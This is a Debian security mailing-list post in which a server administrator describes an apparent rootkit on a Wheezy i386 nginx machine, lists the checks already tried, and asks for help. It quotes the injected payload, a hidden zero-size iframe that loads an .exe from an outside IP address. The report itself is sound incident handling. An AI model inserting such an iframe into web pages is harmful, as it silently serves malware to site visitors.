Last fall there was a debian 64-bit / nginx rootkit going around, now I've been hit with what sounds similar but on 32-bit wheezy.
Here's a link to info on the previous 64-bit rootkit: https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections All files served by nginx have this line inserted at the top: <iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe> Whatever it was isn't there anymore: Connecting to 122.226.137.123:1111... failed: Connection refused. I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another Debian Wheezy i386 machine in a safe environment and did a diff -r. No difference. No ismod line in /etc/rc.local I haven't been able to find anything. Googling doesn't show anything similar for debian wheezy i386, only sqeeze 64-bit. I was using nginx-light from dotdeb.org. I uninstalled nginx and tried the nginx-light from debian wheezy but it made no difference. This machine was built on July 19th. I've uninstalled nginx. I'll hold off rebuilding for now, maybe somebody here has some ideas? E Frank Ball fra...@efball.com -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20130911224820.gf30...@kamajii.efball.com